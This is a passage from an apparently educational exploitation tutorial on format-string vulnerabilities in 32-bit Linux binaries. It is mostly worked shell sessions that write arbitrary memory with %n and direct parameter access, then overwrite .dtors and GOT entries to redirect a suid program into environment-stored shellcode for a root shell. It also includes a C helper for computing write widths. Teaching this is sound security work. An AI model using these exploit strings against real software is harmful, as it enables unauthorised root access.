JUNKJUNKJUNKbffff580.3e8.

                                         3e8.
[*] test_val @ 0x080495d0 = 205 0x000000cd
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$
$ pcalc 0xab - 0xcd
        -34             0xffffffde     0y11111111111111111111111111011110
$ pcalc 0x1ab - 0xcd
        222             0xde            0y11011110
$ ./fmt_vuln2 $(printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08")%x.%x.%163x.%n%222x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.

                                         3e8.

                                           4b4e554a
[*] test_val @ 0x080495d0 = 109517 0x0001abcd
[*] next_val @ 0x080495d4 = 286331136 0x11111100
$
$ pcalc 0x06 - 0xab
        -165            0xffffff5b       0y11111111111111111111111101011011
$ pcalc 0x106 - 0xab
        91              0x5b             0y1011011
$ ./fmt_vuln2 $(printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08")%x.%x.%163x.%n%222x%n%91x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

                                         3e8.

                                          4b4e554a

                                                         4b4e554a
[*] test_val @ 0x080495d0 = 33991629 0x0206abcd
[*] next_val @ 0x080495d4 = 286326784 0x11110000
$

With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.

$ pcalc 0x08 - 0x06
        2             0x2          0y10
$ ./fmt_vuln2 $(printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08")%x.%x.%163x.%n%222x%n%91x%n%2x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%2x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

                                 3e8.

                                   4b4e554a
                                                4b4e554a4b4e554a
[*] test_val @ 0x080495d0 = 235318221 0x0e06abcd
[*] next_val @ 0x080495d4 = 285212674 0x11000002
$

What happened here? The difference between 0x06 and 0x08 is only 2, but 8 bytes are outputted, resulting in the byte 0x0e being written by the %n format parameter instead. This is because the field width option for the %x format parameter is only a minimum field width, and 8 bytes of data were to be outputted. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.

$ pcalc 0x108 - 0x06
        258             0x102          0y100000010
$ ./fmt_vuln2 $(printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08")%x.%x.%163x.%n%222x%n%91x%n%258x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%258x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

                                 3e8.

                                   4b4e554a
                                                   4b4e554a

                                4b4e554a
[*] test_val @ 0x080495d0 = 134654925 0x0806abcd
[*] next_val @ 0x080495d4 = 285212675 0x11000003
$

Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all 4 bytes of the variable test_val. Any value subtractions to the least significant byte can be accomplished by wrapping the byte around. Also, any additions less than 8 may need to be wrapped around in a similar fashion.
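The bookkeeping for the second, third, and fourth writes can be automated. The sketch below computes the field width for each remaining %x from the target value and the byte count after the first write. The function name plan_widths is hypothetical, and it assumes each spacer word prints as 8 hexadecimal digits (as JUNK does), so any increment smaller than 8 is wrapped around by adding 256.

```c
#include <stdint.h>

/* Compute the field widths for the %x parameters that precede the second,
   third, and fourth %n, so that the least significant byte of the running
   count matches each remaining byte of target in turn. */
void plan_widths(uint32_t target, unsigned int count_after_first, int widths[3])
{
    unsigned int count = count_after_first;

    for (int i = 1; i < 4; i++) {
        unsigned int want = (target >> (8 * i)) & 0xffu;
        unsigned int inc = (want - count) & 0xffu;   /* distance modulo 256 */

        if (inc < 8)          /* too small for an 8-digit word: wrap around */
            inc += 256;
        widths[i - 1] = (int)inc;
        count += inc;
    }
}
```

For a target of 0x0806abcd and a count of 205 after the first write, this yields 222, 91, and 258, the same widths worked out by hand above. For 0xddccbbaa starting from 170, it yields 17 three times.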

0x295 Direct Parameter Access

Direct parameter access is a way to simplify format-string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.

As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %N$d would access the Nth parameter and display it as a decimal number.

printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);

The preceding printf() call would have the following output:

7th: 70, 4th: 00040

First, the 70 is printed as a decimal number when the format parameter of %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05. None of the other parameter arguments are touched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.

$ ./fmt_vuln AAAA%x.%x.%x.%x
The right way:
AAAA%x.%x.%x.%x
The wrong way:
AAAAbffff5a0.3e8.3e8.41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$ ./fmt_vuln AAAA%4\$x
The right way:
AAAA%4$x
The wrong way:
AAAA41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Because this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed the right way.

Direct parameter access also simplifies the writing of memory addresses. Because memory can be accessed directly, there's no need for 4-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually perform this function can just directly access a piece of memory found before the format string. For practice, let's try writing a more realistic looking address of 0xbffffd72 into the variable test_val using direct parameter access.

$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$x%4\$n
The right way:
%3$x%4$n
The wrong way:
3e8
[*] test_val @ 0x08049570 = 19 0x00000013
$ pcalc 0x72 - 16
        98              0x62             0y1100010
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n
The right way:
%3$98x%4$n
The wrong way:

                       3e8
[*] test_val @ 0x08049570 = 114 0x00000072
$
$ pcalc 0xfd - 0x72
        139             0x8b            0y10001011
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n%3\$139x%5\$n
The right way:
%3$98x%4$n%3$139x%5$n
The wrong way:

                        3e8

                  3e8
[*] test_val @ 0x08049570 = 64882 0x0000fd72
$
$ pcalc 0xff - 0xfd
        2              0x2              0y10
$ pcalc 0x1ff - 0xfd
        258            0x102            0y100000010
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n%3\$139x%5\$n%3\$258x%6\$n
The right way:
%3$98x%4$n%3$139x%5$n%3$258x%6$n
The wrong way:

                       3e8

                3e8

                                                            3e8
[*] test_val @ 0x08049570 = 33553778 0x01fffd72
$
$ pcalc 0xbf - 0xff
        -64             0xffffffc0     0y11111111111111111111111111000000
$ pcalc 0x1bf - 0xff
        192             0xc0           0y11000000
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n%3\$139x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$98x%4$n%3$139x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                       3e8

                 3e8

                                                            3e8
                                     3e8
[*] test_val @ 0x08049570 = -1073742478 0xbffffd72
$

Using direct parameter access simplifies the process of writing an address and shrinks the mandatory size of the format string.

The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.

0x296 Detours with dtors

In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main function is executed, and destructor functions are executed just before the main function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.

A function can be declared as a destructor function by defining the destructor attribute, as seen in the following code example.

dtors_sample.c code

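#include <stdio.h>
#include <stdlib.h>

/* Declare cleanup() as a destructor so it runs automatically on exit. */
static void cleanup(void) __attribute__ ((destructor));

int main(void)
{
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

/* Never called directly; it is reached through the .dtors table. */
void cleanup(void)
{
   printf("In the cleanup function now..\n");
}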

In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main function exits, as shown next.

$ gcc -o dtors_sample dtors_sample.c
$ ./dtors_sample
Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup function now..
$

This behavior of automatically executing a function on exit is controlled by the .dtors table section of the binary. This section is an array of 32-bit addresses terminated by a null address. The array always begins with 0xffffffff and ends with the null address of 0x00000000. Between these two are the addresses of all the functions that have been declared with the destructor attribute.

The nm command can be used to find the address of the cleanup function, and objdump can be used to examine the sections of the binary.

$ nm ./dtors_sample
080494d0 D _DYNAMIC
080495b0 D _GLOBAL_OFFSET_TABLE_
08048404 R _IO_stdin_used
         w _Jv_RegisterClasses
0804959c d __CTOR_END__
08049598 d __CTOR_LIST__
080495a8 d __DTOR_END__
080495a0 d __DTOR_LIST__
080494cc d __EH_FRAME_BEGIN__
080494cc d __FRAME_END__
080495ac d __JCR_END__
080495ac d __JCR_LIST__
080495cc A __bss_start
080494c0 D __data_start
080483b0 t __do_global_ctors_aux
08048300 t __do_global_dtors_aux
080494c4 d __dso_handle
         w __gmon_start__
         U __libc_start_main@@GLIBC_2.0
080495cc A _edata
080495d0 A _end
080483e0 T _fini
08048400 R _fp_hw
08048254 T _init
080482b0 T _start
080482d4 t call_gmon_start
0804839c t cleanup
080495cc b completed.1
080494c0 W data_start
         U exit@@GLIBC_2.0
08048340 t frame_dummy
08048368 T main
080494c8 d p.0
         U printf@@GLIBC_2.0
$ objdump -s -j .dtors ./dtors_sample

./dtors_sample:     file format elf32-i386
Contents of section .dtors:
 80495a0 ffffffff 9c830408 00000000       ............
$

The nm command shows that the cleanup function is located at 0x0804839c. It also reveals that the .dtors section starts at 0x080495a0 with __DTOR_LIST__ and ends at 0x080495a8 with __DTOR_END__. This means that 0x080495a0 should contain 0xffffffff, 0x080495a8 should contain 0x00000000, and the address between them, 0x080495a4, should contain the address of the cleanup function, 0x0804839c.

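The objdump command shows the actual contents of the .dtors section, although in a slightly confusing format. The first value of 80495a0 is simply the address where the .dtors section is located. After that, the raw bytes are shown in the order they sit in memory, rather than as 32-bit values. Because the x86 architecture stores the least significant byte first, each address appears byte-reversed: 9c830408 is the address 0x0804839c. Bearing this in mind, everything appears correct.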

An interesting detail about the .dtors section is that it's a writable section. An object dump of the headers will verify this by showing that the .dtors section isn't labeled READONLY.

$ objdump -h ./dtors_sample

./dtors_sample:    file format elf32-i386

Sections:
Idx Name          Size      VMA      LMA      File off Algn
  0 .interp       00000013  080480f4 080480f4 000000f4 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048108 08048108 00000108 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .hash         0000002c  08048128 08048128 00000128 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynsym       00000060  08048154 08048154 00000154 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynstr       00000051  080481b4 080481b4 000001b4 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .gnu.version  0000000c  08048206 08048206 00000206 2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version_r 00000020 08048214 08048214 00000214 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .rel.dyn      00000008  08048234 08048234 00000234 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .rel.plt      00000018  0804823c 0804823c 0000023c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .init         00000018  08048254 08048254 00000254 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .plt          00000040  0804826c 0804826c 0000026c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         00000130  080482b0 080482b0 000002b0 2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  080483e0 080483e0 000003e0 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       000000c0  08048400 08048400 00000400 2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .data         0000000c  080494c0 080494c0 000004c0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 15 .eh_frame     00000004  080494cc 080494cc 000004cc 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dynamic      000000c8  080494d0 080494d0 000004d0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .ctors        00000008  08049598 08049598 00000598 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dtors        0000000c 080495a0 080495a0 000005a0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .jcr          00000004  080495ac 080495ac 000005ac 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got          0000001c  080495b0 080495b0 000005b0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .bss          00000004  080495cc 080495cc 000005cc 2**2
                  ALLOC
 22 .comment      00000060  00000000 00000000 000005cc 2**0
                  CONTENTS, READONLY
 23 .debug_aranges 00000058 00000000 00000000 00000630 2**3
                  CONTENTS, READONLY, DEBUGGING
 24 .debug_info   000000b4  00000000 00000000 00000688 2**0
                  CONTENTS, READONLY, DEBUGGING
 25 .debug_abbrev 0000001c  00000000 00000000 0000073c 2**0
                  CONTENTS, READONLY, DEBUGGING
 26 .debug_line   000000ff  00000000 00000000 00000758 2**0
                  CONTENTS, READONLY, DEBUGGING
$

Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format-string program, fmt_vuln, must have a .dtors section that contains no destructor addresses. This can be inspected using nm and objdump.

$ nm ./fmt_vuln | grep DTOR
0804964c d __DTOR_END__
08049648 d __DTOR_LIST__
$ objdump -s -j .dtors ./fmt_vuln

./fmt_vuln:     file format elf32-i386

Contents of section .dtors:
 8049648 ffffffff 00000000             ........
$

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is only 4 bytes this time, which means there are no addresses between them. The object dump verifies this.

Because the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. The location to overwrite is the address of __DTOR_LIST__ plus 4, which is 0x0804964c (which also happens to be the address of __DTOR_END__ in this case).

If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.

$ export SHELLCODE=`cat shellcode`
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffd90
$ pcalc 0x90 + 4
        148             0x94          0y10010100
$

Shellcode can be put into an environment variable, and the address can be predicted as usual. Because the name of the helper program getenvaddr is 2 bytes longer than the name of the vulnerable fmt_vuln program, the predicted address shifts by 4 bytes, and the shellcode will be located at 0xbffffd94 when fmt_vuln is executed. This address simply has to be written into the .dtors section at 0x0804964c using the format-string vulnerability. The test_val variable is used first, for clarity's sake, but all the necessary calculations can be done in advance.

$ pcalc 0x94 - 16
        132          0x84          0y10000100
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n
The right way:
%3$132x%4$n
The wrong way:

                                                   3e8
[*] test_val @ 0x08049570 = 148 0x00000094
$ pcalc 0xfd - 0x94
        105            0x69             0y1101001
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n
The right way:
%3$132x%4$n%3$105x%5$n
The wrong way:

                                                         3e8

                  3e8
[*] test_val @ 0x08049570 = 64916 0x0000fd94
$ pcalc 0xff - 0xfd
        2               0x2             0y10
$ pcalc 0x1ff - 0xfd
        258             0x102           0y100000010
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n
The wrong way:

                                                      3e8
               3e8

                                                         3e8
[*] test_val @ 0x08049570 = 33553812 0x01fffd94
$ pcalc 0xbf - 0xff
        -64            0xffffffc0       0y11111111111111111111111111000000
$ pcalc 0x1bf - 0xff
        192            0xc0             0y11000000
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                                                   3e8

               3e8

                                                      3e8

                                    3e8
[*] test_val @ 0x08049570 = -1073742444 0xbffffd94
$

Now the first four addresses in the beginning of the format string just need to be changed to 0x0804964c, 0x0804964d, 0x0804964e, and 0x0804964f, in order to write the 0xbffffd94 address to the .dtors section, instead of to test_val.

$ ./fmt_vuln `printf "\x4c\x96\x04\x08\x4d\x96\x04\x08\x4e\x96\x04\x08\x4f\x96\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                                                           3e8

                  3e8

                                                               3e8

                                   3e8
[*] test_val @ 0x08049570 = -72 0xffffffb8
sh-2.05a# whoami
root
sh-2.05a#

Even though the .dtors section isn't properly terminated with a null address of 0x00000000, the shellcode address is still considered to be a destructor function, and it will be called when the program is exited, providing a root shell.

0x297 Overwriting the Global Offset Table

Because a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose: the procedure linkage table, or PLT for short. This section consists of many jump instructions, each one corresponding to the address of a function. It works sort of like a springboard. Each time a shared function needs to be called, control will pass through the procedure linkage table.

An object dump disassembling the PLT section in the vulnerable format-string program (fmt_vuln) shows these jump instructions:

$ objdump -d -j .plt ./fmt_vuln

./fmt_vuln:      file format elf32-i386

Disassembly of section .plt:

08048290 <.plt>:
8048290:    ff 35 58 96 04 08    pushl    0x8049658
8048296:    ff 25 5c 96 04 08    jmp      *0x804965c
804829c:    00 00                add      %al,(%eax)
804829e:    00 00                add      %al,(%eax)
80482a0:    ff 25 60 96 04 08    jmp      *0x8049660
80482a6:    68 00 00 00 00       push      $0x0
80482ab:    e9 e0 ff ff ff       jmp       8048290 <_init+0x18>
80482b0:    ff 25 64 96 04 08    jmp       *0x8049664
80482b6:    68 08 00 00 00       push      $0x8
80482bb:    e9 d0 ff ff ff       jmp       8048290 <_init+0x18>
80482c0:    ff 25 68 96 04 08    jmp       *0x8049668
80482c6:    68 10 00 00 00       push      $0x10
80482cb:    e9 c0 ff ff ff       jmp       8048290 <_init+0x18>
80482d0:    ff 25 6c 96 04 08    jmp       *0x804966c
80482d6:    68 18 00 00 00       push      $0x18
80482db:    e9 b0 ff ff ff       jmp       8048290 <_init+0x18>
$

One of these jump instructions is associated with the exit function, which is called at the end of the program. If the jump instruction used for the exit function can be manipulated to direct the execution flow into shellcode instead of the exit function, a root shell will be spawned. Next, the PLT section is examined in a bit more detail.

$ objdump -h ./fmt_vuln | grep -A 1 .plt
  8 .rel.plt 00000020 08048258 08048258 00000258 2**2
             CONTENTS, ALLOC, LOAD, READONLY, DATA
--
 10 .plt     00000050 08048290 08048290 00000290 2**2
             CONTENTS, ALLOC, LOAD, READONLY, CODE
$

As this output shows, the procedure linkage table is unfortunately read-only. But closer examination of the jump instructions reveals that they aren't jumping to addresses, but to pointers to addresses. This means that the actual locations of the functions are stored at the memory addresses 0x08049660, 0x08049664, 0x08049668, and 0x0804966c.

These memory addresses lie in another special section, called the global offset table (GOT). One very interesting detail about the global offset table is that it isn't marked as read-only, as the following output shows.

$ objdump -h ./fmt_vuln | grep -A 1 .got
 20 .got          00000020 08049654 08049654 00000654 2**2
                  CONTENTS, ALLOC, LOAD, DATA
$ objdump -d -j .got ./fmt_vuln
./fmt_vuln: file format elf32-i386

Disassembly of section .got:

08049654 <_GLOBAL_OFFSET_TABLE_>:
 8049654:        78 95 04 08 00 00 00 00 00 00 00 00 a6 82 04 08
x...............
 8049664:        b6 82 04 08 c6 82 04 08 d6 82 04 08 00 00 00 00
................
$

This shows that the jump instruction jmp *0x08049660 in the procedure linkage table actually jumps the program execution to 0x080482a6, because 0x080482a6 is located at 0x08049660 in the global offset table. The subsequent jump instructions (jmp *0x08049664, jmp *0x08049668, and jmp *0x0804966c) actually jump to 0x080482b6, 0x080482c6, and 0x080482d6, respectively. Because the global offset table can be written to, if one of these addresses is overwritten, the execution flow of the program can be controlled through the procedure linkage table, even though the procedure linkage table itself is read-only.

The necessary information, including which function each entry belongs to, can be obtained by displaying the dynamic relocation entries for the binary with objdump.

$ objdump -R ./fmt_vuln

./fmt_vuln: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049670 R_386_GLOB_DAT    __gmon_start__
08049660 R_386_JUMP_SLOT   __libc_start_main
08049664 R_386_JUMP_SLOT   printf
08049668 R_386_JUMP_SLOT   exit
0804966c R_386_JUMP_SLOT   strcpy


$

This reveals that the address of the exit function is stored in the global offset table at 0x08049668. If the address at this location is overwritten with the address of the shellcode, the program should call the shellcode when it thinks it's calling the exit function.

As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format-string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before, meaning that the only thing that needs adjustment is the first 16 bytes of the format string. The calculations for the %x format parameters will be done once again for clarity.


$ export SHELLCODE=`cat shellcode`
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffd90
$ pcalc 0x90 + 4
        148             0x94          0y10010100
$ pcalc 0x94 - 16
        132             0x84          0y10000100
$ pcalc 0xfd - 0x94
        105             0x69          0y1101001
$ pcalc 0x1ff - 0xfd
        258             0x102         0y100000010
$ pcalc 0x1bf - 0xff
        192             0xc0          0y11000000
$ ./fmt_vuln `printf "\x68\x96\x04\x08\x69\x96\x04\x08\x6a\x96\x04\x08\x6b\x96\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                                                   3e8

               3e8

                                                      3e8

                                    3e8
[*] test_val @ 0x08049570 = -72 0xffffffb8
sh-2.05a# whoami
root
sh-2.05a#

When fmt_vuln tries to call the exit function, the address of the exit function is looked up in the global offset table and is jumped to via the procedure linkage table. Because the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.

Another advantage of overwriting the global offset table is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.

The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.